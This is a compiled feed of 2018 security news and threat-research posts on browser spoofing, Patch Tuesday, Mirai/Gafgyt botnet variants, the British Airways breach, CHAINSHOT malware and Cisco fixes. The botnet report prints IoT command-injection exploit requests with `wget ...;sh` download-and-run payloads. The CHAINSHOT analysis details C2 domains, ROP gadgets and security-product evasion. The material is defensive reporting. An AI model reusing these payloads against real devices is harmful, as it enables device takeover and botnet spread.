Beware! Unpatched Safari Browser Hack Lets Attackers Spoof URLs

A security researcher has discovered a serious vulnerability that could allow attackers to spoof website addresses in the Microsoft Edge web browser for Windows and Apple Safari for iOS.

While Microsoft fixed the address bar URL spoofing vulnerability last month as part of its monthly security updates, Safari is still unpatched, potentially leaving Apple users vulnerable to phishing attacks.

The phishing attacks today are sophisticated and increasingly more difficult to spot, and this newly discovered vulnerability takes it to another level that can bypass basic indicators like URL and SSL, which are the first things a user checks to determine if a website is fake.

Discovered by Pakistan-based security researcher Rafay Baloch, the vulnerability (CVE-2018-8383) is due to a race condition type issue caused by the web browser allowing JavaScript to update the page address in the URL bar while the page is loading.

Here’s How the URL Spoofing Vulnerability Works

Successful exploitation of the flaw could potentially allow an attacker to initially start loading a legitimate page, which would cause the page address to be displayed in the URL bar, and then quickly replace the code in the web page with a malicious one.

“Upon requesting data from a non-existent port the address was preserved and hence a due to race condition over a resource requested from non-existent port combined with the delay induced by setInterval function managed to trigger address bar spoofing,” Baloch explains on his blog.

“It causes the browser to preserve the address bar and to load the content from the spoofed page. The browser will however eventually load the resource, however the delay induced with setInterval function would be enough to trigger the address bar spoofing.”

Since the URL displayed in the address bar does not change, the phishing attack would be difficult for even a trained user to detect.

Using this vulnerability, an attacker can impersonate any web page, including Gmail, Facebook, Twitter, or even bank websites, and create fake login screens or other forms to steal credentials and other data from users, who see the legitimate domain in the address bar.

Baloch created a proof-of-concept (PoC) page to test the vulnerability, and observed that both Microsoft Edge and Apple Safari browsers “allowed javascript to update the address bar while the page was still loading.”

Proof-of Concept Video Demonstrations

The researcher has also published proof of concept videos for both Edge and Safari:


According to Baloch, both Google Chrome and Mozilla Firefox web browsers are not affected by this vulnerability.

While Microsoft had already patched the issue last month with its Patch Tuesday updates for August 2018, Baloch has yet to get a response from Apple about the flaw he reported to the company back on June 2.

The researcher disclosed the full technical details of the vulnerability and proof-of-concept (PoC) code for Edge only after the 90-day disclosure window, but he is holding the proof-of-concept code for Safari until Apple patches the issue in the upcoming version of Safari.

Go to Source

Microsoft Patch Tuesday – September 2018

Microsoft released its monthly set of security updates today for a variety of its products that address a variety of bugs. The latest Patch Tuesday covers 61 vulnerabilities, 17 of which are rated “critical,” 43 that are rated “important” and one that is considered to have “moderate” severity.

The advisories cover bugs in the Internet Explorer web browser, Jet Database Engine and the Chakra scripting engine, among other products and software.

This update also includes two critical advisories, one of which covers security updates to Adobe Flash, and another that deals with a denial-of-service vulnerability in the Microsoft Windows operating system.


Microsoft released coverage for 17 critical bugs. Cisco Talos believes 16 of these are of special importance and need to be addressed by users immediately.

CVE-2018-0965 is a remote code execution vulnerability in the Windows Hyper-V hypervisor. An attacker can exploit this vulnerability by running a specially crafted application on a guest system that would cause the system operating Hyper-V to execute arbitrary code. The flaw lies in the way that Hyper-V validates inputs from an authenticated user on a guest OS.

CVE-2018-8367 is a remote code execution vulnerability in the Chakra scripting engine. The engine improperly handles objects in memory in the Microsoft Edge web browser that could allow an attacker to corrupt the system’s memory and execute arbitrary code with the user’s credentials.

CVE-2018-8420 is a remote code execution vulnerability in Microsoft XML Core Services MSXML. An attacker could trick the user into visiting a specially crafted, malicious website designed to invoke MSXML through a web browser, allowing the attacker to eventually run code and take control of the user’s system.

CVE-2018-8461 is a remote code execution vulnerability in Internet Explorer that exists when the web browser improperly accesses objects in memory. This bug could corrupt memory in a way that an attacker could execute arbitrary code with the same rights as the current user. A user would need to visit a specially crafted, malicious website to trigger this vulnerability.

CVE-2018-8475 is a remote code execution vulnerability in Windows OS, which exists due to the image-loading functionality improperly handling malformed image files. An attacker could exploit this bug by convincing a user to load a malformed image file from either a web page, email or other method.

CVE-2018-8332 is a remote code execution vulnerability in the Windows font library. There are multiple ways in which an attacker could exploit this flaw, including convincing the user to click on a malicious web page or providing the user with a specially crafted, malicious document.

CVE-2018-8391 is a remote code execution vulnerability in the Chakra scripting engine. An attacker can exploit this flaw if a user is logged on with an administrative account.

CVE-2018-8439 is a remote code execution vulnerability in the Windows Hyper-V hypervisor. The bug exists in Hyper-V’s validation on a host server. An attacker can exploit this flaw by running a specially crafted application on a guest operating system that could lead to the machine running Hyper-V executing arbitrary code.

CVE-2018-8447 is a remote code execution vulnerability in Internet Explorer. An attacker could exploit this vulnerability by tricking a user into visiting a specially crafted web page while using the Internet Explorer browser, or by taking advantage of a compromised website through advertisements or attachments that the user would have to click on.

CVE-2018-8456 and CVE-2018-8459 are remote code execution vulnerabilities that exist in the Chakra scripting engine’s handling of objects in memory. This bug could corrupt memory in a way that an attacker could execute arbitrary code with the same rights as the current user.

CVE-2018-8457 is a remote code execution vulnerability that exists in the way Microsoft web browsers’ scripting engines handle objects in memory. An attacker could host a specially crafted website to exploit this vulnerability, and then convince the user to visit the website while using a Microsoft web browser, or they could embed an ActiveX control that is marked “safe for initialization” in a Microsoft Office file or an application that hosts the browser’s rendering engine.

CVE-2018-8464 is a remote code execution vulnerability in Microsoft Edge’s PDF reader that exists in the way the reader handles objects in memory. An attacker could exploit this bug by convincing a user to click on a web page that contains a malicious PDF, or by hosting the PDF on websites that host user-provided content.

CVE-2018-8465CVE-2018-8466 and CVE-2018-8467 are remote code execution vulnerabilities in the Chakra scripting engine that lie in the way it handles objects in memory in the Microsoft Edge web browser. An attacker can exploit these bugs by tricking the user into opening a malicious web page, or an advertisement that is hosted on a website that allows user-provided content.

The other critical vulnerability is:


There is also coverage for 43 important vulnerabilities, 11 of which we wish to highlight.

CVE-2018-8354 is a remote code execution vulnerability that exists in the way the scripting engine handles objects in memory in the Microsoft Edge web browser. A user would need to visit a specially crafted, malicious website in order to trigger this vulnerability.

CVE-2018-8392 and CVE-2018-8393 are buffer overflow vulnerabilities in the Microsoft Jet Database Engine. To exploit these bugs, a user must open a specially crafted Excel file while using an at-risk version of Windows. An attacker could exploit these vulnerabilities to execute code on the victim’s machine at an administrator’s level.

CVE-2018-8430 is a remote code execution vulnerability in Microsoft Word 2013 and 2016. An attacker can exploit this by tricking a user into opening a specially crafted, malicious PDF.

CVE-2018-8447 is an elevation of privilege vulnerability that lies in the way Windows processes calls to Advanced Local Procedure Call (ALPC). An attacker would need to log onto the system directly in order to exploit this vulnerability, and then run a specially crafted application.

CVE-2018-8331 is a remote code execution vulnerability in Microsoft Excel that exists when the software fails to correctly handle objects in memory. A user could trigger this bug by opening a specially crafted, malicious file in an email or on a web page.

CVE-2018-8315 is an information disclosure vulnerability in Microsoft’s scripting engine that could expose uninitialized memory if exploited. An attacker could access this information by convincing a user to visit a malicious website and then leveraging the vulnerability to obtain privileged data from the browser process.

CVE-2018-8335 is a denial-of-service vulnerability in the Microsoft Server Block Message (SMB). An attacker can send a specially crafted request to the server to trigger this vulnerability.

CVE-2018-8425 is a spoofing vulnerability in the Microsoft Edge web browser. The bug lies in the way the browser handles specific HTML content. If an attacker correctly exploits this bug, a user could be tricked into thinking they are visiting a legitimate website when they are actually on a malicious page.

CVE-2018-8440 is an elevation of privilege vulnerability that occurs when Windows incorrectly handles calls to Advanced Local Procedure Call (APLC). An attacker needs to log onto the system directly to exploit this vulnerability, and then run a specially crafted application to take over the system. This vulnerability has been spotted in the wild as part of several pieces of malware.

The other vulnerabilities that are rated “important” are:

Go to Source
Author: Talos Group

Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall

Executive Summary:

Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.

These variants are notable for two reasons:

  • The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
  • The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).

These developments suggest these IOT botnets are increasingly targeting enterprise devices with outdated versions.

All organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices. For Palo Alto Networks customers, WidlFire detects all related samples with malicious verdicts. Additional protections are noted in the conclusion below.


On September 7, 2018, Unit 42 found samples of a Mirai variant that incorporates exploits targeting 16 separate vulnerabilities. While the use of multiple exploits within a single sample of Mirai has been observed in the past, this is the first known instance of Mirai targeting a vulnerability in Apache Struts.

In addition, Unit 42 found the domain that is currently hosting these Mirai samples previously resolved to a different IP address during the month of August. During that time this IP was intermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866 a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS). SonciWall has been notified of this development.

The incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could indicate a larger movement from consumer device targets to enterprise targets.

Apache Struts exploit in multi-exploit Mirai variant

The exploit targeting Apache Struts in the new variant we found targets CVE-2017-5638, an arbitrary command execution vulnerability via crafted Content-Type, Content-Disposition, or Content-Length HTTP headers. Its format can be seen in Figure 1, with the payload highlighted.


Figure 1 CVE-2017-5638 exploit format

The other 15 exploits incorporated in this Mirai variant are detailed in Table 2 in the Appendix below.

While these samples are variants of Mirai, they don’t include the bruteforce functionality generally used by Mirai. They use l[.]ocalhost[.]host:47883 as C2, and the same encryption scheme as Mirai with the key 0xdeadf00d.

SonicWall GMS exploit in Gafgyt variant

The domain l[.]ocalhost[.]host used for C2 and to serve payloads in the Mirai variant discussed above, has also been found associated with other Mirai activity in the past as far back as November 2016.

For part of the month of August 2018, that same domain resolved to a different IP address 185[.]10[.]68[.]127. At that time we found that IP hosting samples of Gafgyt containing an exploit for a recently disclosed SonicWall vulnerability (CVE-2018-9866) affecting older, unsupported versions of SonicWall Global Management System (GMS) (8.1 and older) that is not present in currently supported versions.

The vulnerability CVE-2018-9866 targeted by the exploit stems from the lack of sanitization of XML-RPC requests to the set_time_config method. Figure 2 shows the exploit used in the sample, with the payload highlighted.


Figure 2 SonicWall set_time_config RCE format

These samples first surfaced on August 5, less than a week after the publication of a Metasploit module for this vulnerability. The SonicWall public advisory on the issue published on July 17, 2018, can be found here.

The samples we found are built using the Gafgyt codebase rather than Mirai. Some of the commands supported are described in the table below.

Command Description
!* SCANNER <HUAWEI/GPON/DLINK/SONICWALL/OFF> Based on arguments provided, the bot starts sending the associated exploit to devices.

·      HUAWEI: Send CVE-2017-17215 See previous campaigns)

·      GPON: Same as above

·      DLINK: Send D-Link DSL 2750B OS Command Injection (see Table 1)

·      SONICWALL: Send exploit in Figure X.

·      OFF: kills a running process associated with the bot

!* BIN_UPDATE Fetches an update from , saves it to , installs update
!* BN Launch a Blacknurse DDoS attack against : for a duration of

Table 3 Some commands supported by variant with SonicWall exploit

Blacknurse is a low bandwidth DDoS attack involving ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016. The earliest samples we have seen supporting this DDoS method are from September 2017.


The incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could be an indication of a larger movement from consumer device targets to enterprise targets.

Palo Alto Networks AutoFocus customers can track these activities using individual exploit tags:

AutoFocus customers can also use the following malware family tags:

WildFire detects all related samples with malicious verdicts.

Here is a list of other vulnerabilities targeted in the Mirai variant targeting Apache Struts:

Vulnerability Affected Devices Exploit Format
CVE-2017-5638, Devices with unpatch Apache Struts
Linksys RCE Linksys E-series devices
POST /tmBlock.cgi HTTP/1.1

Authorization: Basic YWRtaW46cG9ybmh1Yg==

Content-Type: application/x-www-form-urlencoded

Content-Length: 215

submit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `wget%20;sh%20/tmp/nemp`&StartEPI=1


The samples contain other versions of the same exploit using GET and POST requests, aimed at

/tmBlock.cgi, /tmUnblock.cgi, /hndBlock.cgi and /hndUnblock.cgi
Vacron NVR RCE Vacron NVR Devices Similar to previous campaigns

This variant also contains a POST request version of the same exploit :

POST /board.cgi HTTP/1.1

Content-Length: 118

Content-Type: application/x-www-form-urlencoded

D-Link command.php RCE Some  D-Link devices
POST /command.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Content-Length: 127

CCTV/DVR RCE CCTVs, DVRs from over 70 vendors Similar to previous campaigns
EnGenius RCE EnGenius EnShare IoT Gigabit Cloud Service 1.4.11
POST /web/cgi-bin/usbinteract.cgi HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Length: 133

AVTECH  Unauthenticated Command Injection AVTECH IP Camera/NVR/DVR Devices
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&;XmlAp%20r%20Account.User1.Password>$(wget%20;sh%20/tmp/nemp);&password=admin

Content-Type: application/x-www-form-urlencoded
CVE-2017-6884 Zyxel routers
GET /cgi-bin/luci/;stok=/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&`wget%20;sh%20/tmp/nemp`&server_ip= HTTP/1.1

Accept: text/html,application/xhtml777ml,application/xml;q=0.9,image/webp,*/*;q=0.8


Accept-Language: en-US,en;q=0.8

Cookie: csd=9; sysauth=

Connection: close
NetGain ‘ping’ Command Injection NetGain Enterprise Manager 7.2.562
POST /u/jsp/tools/exec.jsp HTTP/1.1

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Cookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF

Connection: close

Pragma: no-cache

Cache-Control: no-cache

Content-Length: 206

NUUO OS Command Injection NUUO NVRmini 2 3.0.8
POST /handle_iscsi.php HTTP/1.1

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept: */*

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.8

Cookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin

Connection: close

Content-Length: x

NUUOS OS Command Injection NUUO NVRmini 2 3.0.8
POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1

Cache-Control: max-age=0

Content-Length: 187

Content-Type: application/x-www-form-urlencoded

Accept: text/html,application/xhtml777ml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.8

Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en

Connection: close

Netgear setup.cgi unauthenticated RCE DGN1000 Netgear routers Similar to previous campaigns
HNAP SoapAction-Header Command Execution D-Link devices Similar to previous campaigns

This variant uses an effective version of the exploit as opposed to the faulty one used in the campaigns linked above i.e. it targets SOAPAction: http://purenetworks[.]com/HNAP1/GetDeviceSettings/

D-Link OS Command Injection D-Link DSL-2750B Similar to previous campaigns
JAWS Webserver authenticated shell command execution MVPower DVRs, among others Similar to previous campaigns
CVE-2018-10561, CVE-2018-10562 Dasan GPON routers Similar to previous campaigns

This variant also includes a POST request version of the same exploit

Table 2 Other exploits used in the same sample

Indicators of Compromise

Samples with Apache Struts exploit CVE-2017-5638











Samples with Sonicwall GMS exploit CVE-2018-9866
















The post Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall appeared first on Palo Alto Networks Blog.

Go to Source
Author: Ruchna Nigam

British Airways Hacked – 380,000 Payment Cards Compromised

British Airways, who describes itself as “The World’s Favorite Airline,” has confirmed a data breach that exposed personal details and credit-card numbers of up to 380,000 customers and lasted for more than two weeks.

So who exactly are victims?

In a statement released by British Airways on Thursday, customers booking flights on its website ( and British Airways mobile app between late 21 August and 5 September were compromised.

The airline advised customers who made bookings during that 15 days period and believe they may have been affected by this incident to “contact their banks or credit card providers and follow their recommended advice.”

British Airways stated on its Twitter account that personal details stolen in the breach included their customers’ names and addresses, along with their financial information, but the company assured its customers that the hackers did not get away with their passport numbers or travel details.

The company also said that saved cards on its website and mobile app are not compromised in the breach. Only cards that have been used by you to make booking payments during the affected period are stolen.

“We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app,” the company said in a statement. “The stolen data did not include travel or passport details.”

Although the statement released by the did not mention the number of affected customers, the company’s spokesperson confirmed to the media that some 380,000 payment cards were compromised in the breach.

Also currently, it is not clear how the data breach occurred, but some media outlets are reporting that the breach was identified when “a third party noticed some unusual activity” and informed the company about it.

A spokesperson from British Airways confirmed The Hacker News that “this is data theft, rather than a breach,” which suggests someone with privileged access to the data might have stolen it.

British Airways also informed the police and the Information Commissioner and currently reaching out to affected customers directly.

However, the company assured its customers that the security breach has now been resolved, and its website is working normally and is now safe for passengers to check-in online, and book flights online.

The National Crime Agency is aware of the British Airways data breach and is “working with partners to assess the best course of action.”

Air Canada also suffered a severe data breach late last month, which, along with personal data, also exposed passport number and other passport and travel details of about 20,000 mobile app customers.

Go to Source

Slicing and Dicing CVE-2018-5002 Payloads: New CHAINSHOT Malware

This story begins with one of our blog authors, who, following the discovery of a new Adobe Flash 0-day, found several documents using the same exploit that were used in targeted attacks. We were also able to collect network captures including the encrypted malware payload. Armed with these initial weaponized documents, we uncovered additional attacker network infrastructure, were able to crack the 512-bit RSA keys, and decrypt the exploit and malware payloads. We have dubbed the malware ‘CHAINSHOT’, because it is a targeted attack with several stages and every stage depends on the input of the previous one.

This blog describes the process we took to analyze the malware, how we managed to decrypt the payloads, and then how we found parts of a new attack framework. We also found additional network infrastructure which indicates similar attacks were conducted against a wide range of targets with disparate interests. This attack chain is designed in a way that makes it very difficult to execute a single part on its own, be it the exploit or payload. To make our analysis easier, we reproduced the server-side infrastructure, by doing so we were able to conduct dynamic analysis and get a better understanding how the exploit and payload work together.

This serves as a follow-up of Icebrg’s article which describes the initial findings.

Cracking a RSA Key

First, let’s recap how the overall attack chain works to understand at which point the RSA key is needed. The malicious Microsoft Excel document contains a tiny Shockwave Flash ActiveX object with the following properties:


Figure 1. Malicious Shockwave Flash ActiveX object properties

The “Movie” property contains a URL to a Flash application which is downloaded in cleartext and then executed. The “FlashVars” property contains a long string with 4 URLs which are passed to the downloaded Flash application. The Flash application is an obfuscated downloader which creates a random 512-bit RSA key pair in memory of the process. While the private key remains only in memory, the public keys’ modulus n is sent to the attacker’s server. On the server side, the modulus is used together with the hardcoded exponent e 0x10001 to encrypt the 128-bit AES key which was used previously to encrypt the exploit and shellcode payload. The encrypted exploit or payload is sent back to the downloader which uses the in-memory private key to decrypt the AES key and the exploit or payload.

As the modulus is sent to the server of the attacker, it’s also in our network capture. Together with the hardcoded exponent we have the public key which we can use to get the private key. Keep in mind that this was only possible because the attacker chose a key length of 512-bit which is known to be insecure. In order to do so, we have to factorize the modulus n into its two prime numbers p and q. Luckily this problem has already been solved previously, by an awesome public project ‘Factoring as a Service‘. The project uses Amazon EC2’s high computing power and can factorize large integers in just a matter of hours.

Following this logic, let’s take the following modulus of the public key sent to the attacker’s server to get the shellcode payload.


Figure 2. HTTP POST request for the encrypted shellcode payload with the modulus n in hexadecimal

After removing the first 2 bytes which are used in this case to retrieve the 32-bit version of the shellcode payload, we have the following modulus in hexadecimal:


After we have factorized the integer, we get the following two prime numbers in decimal:





With the help of p and q we can calculate the private key. We used a small public tool to create it in Privacy Enhanced Mail (PEM) format:


With the help of the private key we could now decrypt the 128-bit AES key. We used OpenSSL to do this:

openssl rsautl -decrypt -in enc_aes.bin -out dec_aes.bin -inkey private_key.pem

The encrypted AES key is extracted from the encrypted binary blob as described by Icebrg. It’s at offset 0x4 and has the length of 0x40 bytes. Encrypted AES key:


Decrypted AES key:


Now that we have the decrypted AES key, we can decrypt the actual payload. The Flash downloader uses a custom initialization vector (IV) for the AES algorithm which can be found at offset 0x44 in the encrypted blob and is 16 bytes long:


For the final decryption we used OpenSSL again:

openssl enc -nosalt -aes-128-cbc -d -in payload.bin -out decrypted_payload -K E4DF3353FD6D213E7400EEDA8B164FC0 -iv CC6FC77B877584121AEBCBFD4C23B67C

The decrypted shellcode payload is additionally compressed with zlib which can be seen by looking at the first 2 magic bytes 0x789C. We decompressed it with Offzip. Finally, we have the decrypted shellcode payload. The same procedure can be used to decrypt the Flash exploit which isn’t additionally zlib compressed.

Server-side Reproduction

After we had the decrypted Flash exploit and shellcode payloads, we started to do a static analysis which turned out to be a quite tedious task. This is due to the obfuscation in the exploit and the complexity of shellcode payload which contains its own two PE payloads. Next, we attempted to do a dynamic analysis which quickly turned out to be impossible, because every stage relies on data passed from the previous. The shellcode payload does not execute properly without the data passed to it from the exploit. The exploit does not execute on its own without the variables passed from the downloader and so on.

Due to the difficulties of analyzing the code statically, we decided to reproduce a simplified version of the server-side PHP scripts in order to make a full dynamic analysis possible. As we had the decrypted exploit, shellcode payload and the PCAP, we had all the information required to do so. Specifically, we created the following setup:

  • Local Apache server with XAMPP, with the domain used in the attack configured to resolve to localhost
  • A directory structure which mirrored that on the attackers’ servers (as specified in the PCAPs)
  • Setting of custom HTTP headers as per the PCAPs’ responses.

All of the requested files are sent back gzip encoded, otherwise the attack chain doesn’t work. We have uploaded the PHP scripts to our GitHub account, so you can also play with the different stages and see how it works.

Additional Details of the Flash Exploit

While the exploit has been already described, we want to give some additional details surrounding it that we found during our analysis. In particular, we were interested in the part which transfers execution to the shellcode payload. While most parts of the decompiled ActionScript exploit code are obfuscated, luckily some method names were left in cleartext.

Because the decrypted shellcode payload doesn’t run on its own when transformed into an executable, we have to figure out how execution works and if one or more parameters are passed. Therefore, the most interesting method for us is “executeShellcodeWithCfg32” which indicates we can find the passed data in it. It creates a small shellcode template and fills some placeholder values at runtime. The disassembled template looks as follows:


Figure 3. Shellcode template with placeholders (red) in the Flash exploit to pass execution to the shellcode payload

While the final prepared shellcode looks as follows:


Figure 4. Runtime version of the shellcode template with filled placeholders

Let’s take a look at what values are set to the placeholders (0x11111111, 0x22222222, …). The address 0xA543000 in Figure 4 is the entrypoint of the decrypted shellcode payload which has a small NOP sled in front of the actual code:


Figure 5. Entrypoint of the shellcode template in memory

The address 0x771A1239 in Figure 4 is in the middle of the function NtPrivilegedServiceAuditAlarm in ntdll.dll:


Figure 6. Windows API function NtPrivilegedServiceAuditAlarm

However, we can also see in Figure 4 that before calling the API function via “call edx”, the value 0x4D is moved into eax which is the ID of the API function NtProtectVirtualMemory. By doing so, the function NtProtectVirtualMemory is executed without calling it directly. This trick is likely used to bypass AVs/sandboxes/anti-exploit software which hook NtProtectVirtualMemory and the attacker probably chose NtPrivilegedServiceAuditAlarm as a trampoline as it’s unlikely to be ever be monitored.

The data at this address 0x9DD200C in Figure 4 looks like a structure into which the last NTSTATUS return value of NtProtectVirtualMemory is copied. The address of this structure seems to be passed to the shellcode payload in ebx, however we haven’t figured out what’s its purpose is. Finally, shellcode payload is executed via “call edi”

To sum up, the memory access rights of the shellcode payload are changed in 0x1000 byte blocks to RWE via NtProtectVirtualMemory. The last NTSTATUS code is saved into memory pointed to by ebx and the shellcode payload is executed.

Another interesting aspect of the exploit code is that it sends status messages when something goes wrong at every stage of the exploitation. These status messages are very similar to those send by the initial Flash downloader and are sent to the attacker’s server via fake PNG files (see Icebrg). They also contain the “/stab/” directory in the URL and the actual message is also sent encoded via custom digit combinations. However, the status message of the exploitation code contains additional information in the form of abbreviations of the appropriate stage. By looking at those messages, we can get a better understanding how the exploit works. The following messages are possible:

Status message code  Description
2-0-9-vp Short for VirtualProtect
2-0-9-g3 Short for something like gadget3 (ROP gadget) cause a byte array is created 0x5A5941584159C3 which disassembles to:

pop edx

pop ecx

inc ecx

pop eax

inc ecx

pop ecx


2-0-9-RtlAllocateHeap Self-explaining
2-0-9-DeleteDC Self-explaining
2-0-9-GetDC Self-explaining
2-0-9-sprintf Self-explaining
2-0-9-VP Short for VirtualProtect
2-0-9-RU Short for RtlUnwind
2-0-9-NVP Short for NtProtectVirtualMemory
2-0-9-NPSAA Short for NtPrivilegedServiceAuditAlarm
2-0-9-G Probably short for Gadget
2-0-9-SRP Short for something like StackReturnProcedure because two-byte arrays 0x81C4D8000000C3 and 0x81C4D0000000C3 are created which disassemble to:

add esp, 0D8h


– and –

add esp, 0D0h


2-0-9-PAX Short for something like PopEAX as a byte array 0x58C3 is created before which disassembles to:

pop eax


Table 1. Status messages used in the Flash exploit code

The Shellcode Payload

After the exploit successfully gains RWE permissions, execution is passed to the shellcode payload. The shellcode loads an embedded DLL internally named FirstStageDropper.dll, which we call CHAINSHOT, into memory and runs it by calling its export function “__xjwz97”. The DLL contains two resources, the first is x64 DLL internally named SecondStageDropper.dll and the second is a x64 kernelmode shellcode.

FirstStageDropper.dll is responsible for injecting SecondStageDropper.dll into another process to execute it. While the shellcode payload only contains code to search for and bypass EMET, FirstStageDropper.dll also contains code for Kaspersky and Bitdefender. In case of EMET, it searches the loaded modules for emet.dll and emet64.dll, for Kaspersky it searches for klsihk.dll, and for Bitdefender it searches for avcuf32.dll and avcuf64.dll. It also collects and sends encrypted user system and process information data together with a unique hardcoded ID to the attacker’s server. The data is sent to URLs that contain “/home/” and “/log/” directories and for encryption it uses the Rijndael algorithm. As the attacker server did not respond at the time of our analysis, we guess a command is sent back to execute the SecondStageDropper.dll.

While the samples we obtained inject SecondStageDropper.dll in usermode via thread injection, the x64 shellcode seems to have an option to inject it from kernelmode. However, we haven’t figured out what the exact purpose of it is, since it’s never executed; it also searches for an additional resource which wasn’t present in the samples we analyzed.

The kernelmode shellcode contains parts of Blackbone, an open source library for Windows memory hacking. The following functions are taken from its code:

  • FindOrMapModule
  • BBQueueUserApc
  • BBCallRoutine
  • BBExecuteInNewThread

It also contains code from TitanHide, using identical code to lookup SSDT in Win7 and Win10 as described by the author.

SecondStageDropper.dll acts as a downloader for the final payload. It collects various information from the victim system, encrypts it, and sends it to the attacker’s server. It also scans for the following processes and skips execution if found:

Process name Security Solution


mbam.exe Malwarebytes


seccecenter.exe (contains a typo, should be seccenter.exe)


















Symantec / Norton
avp.exe Kaspersky
HitmanPro.exe Sophos / HitmanPro
abcde.exe ?

Table 2. Process name lookup list

Unfortunately, at the time of the analysis we were unable to obtain additional files, so we were unable to figure out what the final stage is. However, CHAINSHOT contacts the following domains via HTTPS to get the final payload:

  • contact.planturidea[.]net
  • dl.nmcyclingexperience[.]com
  • tools.conductorstech[.]com

In both samples we analyzed the final domains used were the same. We have obtained two x86 versions of the shellcode payload with its embedded PE files and the kernelmode shellcode. While the shellcode payload, FirstStageDropper.dll and kernel shellcode do not differ, the SecondStageDropper.dll contains a couple of different strings. The following strings are different, possibly indicating they are changed for every victim, with the final payload directory being an MD5 representation of the “project name” or something similar.

  Sample 1 Sample 2
User-agent Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0 Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0
Queried final payload directories /0cd173cf1caa2aa03a52b80d7521cc75e




Unique string used in network communication 148a028d-57c6-4094-b07d-720df09246dd 3784113f-b04e-4c1e-b3be-6b0a22464921

Table 3. String differences in SecondStageDropper.dll

The shellcode payload and PE files partly contain the same code indicating a framework was used to create them. For example, both the shellcode and CHAINSHOT itself make extensive use of the same exception handling with custom error codes. They also both use the same code to scan for and bypass EMET. Furthermore, other parts such as the OS version recognition are identical in all samples and the PE files’ compilation timestamps are zeroed out. Another interesting fact is that FirstStageDropper.dll also sends status messages back to the attacker starting with digit “9”. For example, the following network capture from our local tests show a successful network communication up to the point where the attacker presumably sends back the command to execute SecondStageDropper.dll:


Figure 7. Network capture of a successful attack reproduced locally in a VM

Additional Infrastructure

One of the domains reported by IceBrg had an associated SSL certificate which was documented in their write up. By searching for other IP addresses using the same certificate we were able to find a large number of associated domains that were likely also used in similar attack campaigns. Just like the domain contacted within the Excel documents analyzed, the additional domain names are created in a similar way using similar hosting providers and registrars and used names which are very similar to official websites to avoid suspicion. The list of domains can be found in the IOC section.


We uncovered part of a new toolkit which was used as a downloader alongside Adobe Flash exploit CVE-2018-5002 to target victims in the Middle East. This was possible because the attacker made a mistake in using insecure 512-bit RSA encryption. The malware sends user information encrypted to the attacker server and attempts to download a final stage implant. It was allegedly developed with the help of an unknown framework and makes extensive use of custom error handling. Because the attacker made another mistake in using the same SSL certificate for similar attacks, we were able to uncover additional infrastructure indicating a larger campaign.

Palo Alto Networks customers are protected from this threat in the following ways:

  • WildFire detects all malicious Excel documents, the Flash downloader and exploit and all CHAINSHOT samples with malicious verdicts
  • AutoFocus customers can track the samples with the CVE-2018-5002 exploit and CHAINSHOT malware tags
  • Traps detects and blocks the malicious Excel documents with the Flash exploit

Finally, we’d like to thank Tom Lancaster for his assistance in this investigation.

Indicators of Compromise

Adobe Flash Downloader


Adobe Flash Exploit (CVE-2018-5002)



X86 Shellcode Payloads:


















































































The post Slicing and Dicing CVE-2018-5002 Payloads: New CHAINSHOT Malware appeared first on Palo Alto Networks Blog.

Go to Source
Author: Dominik Reichel

Cisco Issues Security Patch Updates for 32 Flaws in its Products

Cisco today released thirty security patch advisory to address a total of 32 security vulnerabilities in its products, three of which are rated critical, including the recently disclosed Apache Struts remote code execution vulnerability that is being exploited in the wild.

Out of the rest 29 vulnerabilities, fourteen are rated high and 15 medium in severity, addressing security flaws in Cisco Routers, Cisco Webex, Cisco Umbrella, Cisco SD-WAN Solution, Cisco Cloud Services Platform, Cisco Data Center Network, and more products.

The three critical security vulnerabilities patched by Cisco address issues in Apache Struts, Cisco Umbrella API, and Cisco RV110W, RV130W and RV215W router’s management interface.

Apache Struts Remote Code Execution Vulnerability (CVE-2018-11776)

The vulnerability, reported late last month by Semmle security researcher Man Yue Mo, resides in the core of Apache Struts and originates due to insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations.


“The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action,” Cisco explains in its advisory.

“In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing.”

